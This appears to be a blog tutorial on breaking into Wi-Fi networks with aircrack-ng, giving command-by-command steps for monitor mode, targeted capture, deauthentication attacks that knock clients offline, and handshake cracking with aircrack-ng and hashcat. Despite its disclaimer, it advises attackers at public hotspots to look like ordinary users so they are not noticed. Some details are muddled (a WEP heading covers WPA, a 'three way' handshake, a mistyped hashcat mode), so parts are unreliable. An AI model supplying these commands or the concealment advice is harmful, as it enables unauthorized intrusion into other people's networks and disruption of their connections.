Reference:
airmon-ng: Sets WiFi Adapter into monitor modeairodump-ng: Record traffic and displays network informationaireplay-ng: Infiltrates networks with self-created packagesaircrack-ng: Used to brute force WEP / WPA2 APsairolib-ng: Manages and stores passwords lists and ESSIDs for calculating WPA keys
* Update for 5GHz Adapters: Command --band a will switch the airodump scan to monitor 5g instead of 2.4
Monitoring, Recon and Dumping
- Using the aircrack-ng suite, Turn on the monitor mode
sudo airmon-ng start wlan0
- Simple passive listening and capture, Used to discover AP in the environment
sudo airodump-ng wlan0mon
- Targeted listening and capture, Focus on one AP and one channel
airodump-ng wlan0mon -c 11 --bssid E8:2C:6D.... -w sonic
Attacking WEP
WEP is an old encryption protocol but still used in some places, It is vulnerable to direct cracking attacks
Here, you want to get the 4-way WPA Handshake, It requires network traffic between the AP and one device
The process can be enhanced by sending deauth packets – – You can Deauth Packets to every device on the Network with “-a” … or you can target a specific device on the Network by adding “-c”
- Aireplay Command used to send Deauth Packets “0” (See sources for more reference)
Deauth connected devices while airodump is running in a separate Terminal to initiate authentication process and try to get the handshake
In the airodump-ng Terminal, the WPA handshake will appear once captured
aireplay-ng -0 15 -a 1C:9E:CC:... -c 3C:2E:FF:... wlan0mon
- 0 means deauthentitcation - - 15 is number of deauths sent - a mac address of access point - c mac address of the client (station #) (This is optional, you can choose to not add this and knock all devices off network) - wlan0mon is the interface name
Aircrack-ng too directly crack the WEP Key
Cracking can be done using aircrack-ng
Note: Use a good Wordlist !
aircrack-ng -a2 -b 28:80:88:0A:6A:CB -w '/home/sock/28:80:88:0A:6A:CB/why_.txt' '/home/sock/beyond-01.cap'
- a [a.mode]: force attack mode (1/WEP, 2/WPA-PSK) - b [bssid]: target selection: access point's MAC - w [words]: path to wordlist(s) filename(s) - Drag and drop the .cap file
Disclaimer: This script is for educational purposes only.
Do not use against any network that you don’t own or have authorization to test.
Introduction
Running “sudo airmon-ng check kill” should be used every time you launch Wi-Fi attacks to ensure there is no other applications that will interfere with our attacks. Good habit to do this every time you plan on hacking a Wi-Fi network.
WPA/WPA2 requires a minimum password of 8 chracters so we need to be using a wordlist that contains passwords >8 characters.
When you’re using the tools needed to hack Wi-Fi networks you’ll notice the Power/PWR level is displayed in dBi or “db” sometimes with a “-” sign before the number displayed. It doesn’t matter which tool you plan on using (airodump-ng, wifite, etc.) since they all display the “Power” level a little differently but all represent the “db/dBi. Notice the power levels, this determines the strength of your signal in relevance to that AP
Hardware and Setup:
It’s important to understand that a wireless antenna improves the tranmission and reception of the radiofrequency (RF) signals giving you a reliable connection to the Wi-Fi network. The gain provided by an antenna is measured in Decibels Isotropic (dBi) which is what’s represented when you’re looking for wireless networks to connect in order to determine which one has the best connection.
Yagi” antennas are known for connecting to a Wi-Fi network from a distance and are widely used in the hacker community. These are best suited when targeting a Wi-Fi network from a great distance.
Imagine someone thinking something was peculiar about their internet connection at a public Wi-Fi and seeing someone with strange antennas, stickers on their laptop, wearing a top hat, and looking up to no good sitting there. It’s just not good. Blend in. Keep your laptop clean looking, keep professional, and appear to be a normal plain user , NO STICKERS ALLOWED
If you encounter an issue with your USBs and Kali won’t start without an error this is most likely because you don’t have a USB 2.0 or 3.0 port enabled. Make sure your Alfa card is plugged in and attached to your Kali VM with the proper USB settings selected for it. If you do not have a USB 3.0 or USB 2.0 port on your computer you won’t be able to use the Alfa network cards required
START:
Instead of me explaining every technical detail about WEP, WPS, and WPA/WPA2 WiFi networks I’ll direct you to an excellent resource
https[.]//wwwyoutube.com/watch?v=QHo2hCzxMr0
Capture the three way handhsake from the Access Point you are looking to target and crack, Usually this is done by Deauthing a device on the network your specifically monitoring, or using “hcxdumptool” for a quiter approach
USE THESE TOOLS – –
airmon-ng
airodump-ng
aireplay-ng
Now at some point you’re going to realize you’re not able to crack every Wi-Fi network you come across and not every Wi-Fi network can be cracked or hacked. It depends on a lot of factors like signal strength, location, password complexity, etc.
Running Hashcat :
To utilize hashcat we must first turn the .cap file into a workable format for hashcat. Go to the directory that wifite saved the .cap file of the network you’re trying to crack and have had no success using default wordlists on.
Using “wpaclean” you can covert your .cap file into the correct format required for hashcat
wpaclean NEW.cap handshake.cap
aircrack-ng -j hashcat.hccapx New.cap
You now have a hccapx file which is meant only for hashcat. We’ll now use the GPU on your host machine to increase password cracking significantly.
hashcat -m 2500 hashcat.hccapx WORDLIST.txt
( -m 2550 specifies the hash file type which in this case relates to WPA/WPA2 )
Setup Alfa aws036acm Adapter:
- sudo apt update - sudo apt upgrade -y - sudo apt dist-upgrade -y - sudo reboot now - sudo apt update - sudo apt install realtek-rtl88xxau-dkms - sudo apt install dkms - git clone https://github.com/aircrack-ng/rtl8812au - cd rtl8812au/ - make - sudo make install - lsusb - iwconfig
Sources:
https://www.aircrack-ng.org/doku.php?id=cracking_wpa https://www.aircrack-ng.org/doku.php?id=newbie_guide https://www.aircrack-ng.org/doku.php?id=compatibility_drivers https://www.aircrack-ng.org/doku.php?id=wpa_capture https://shehackske.medium.com/capturing-and-cracking-wpa-handshake-using-aircrack-ng-d9496f30c7c3 https://cryptokait.com/2020/09/02/taking-password-cracking-to-the-next-level/
Update:
After running, airmon-ng check kill to activate adapter to find AP’s
run, service NetworkManager restart – To turn back on Network wifi
Leave a Reply
You must be logged in to post a comment.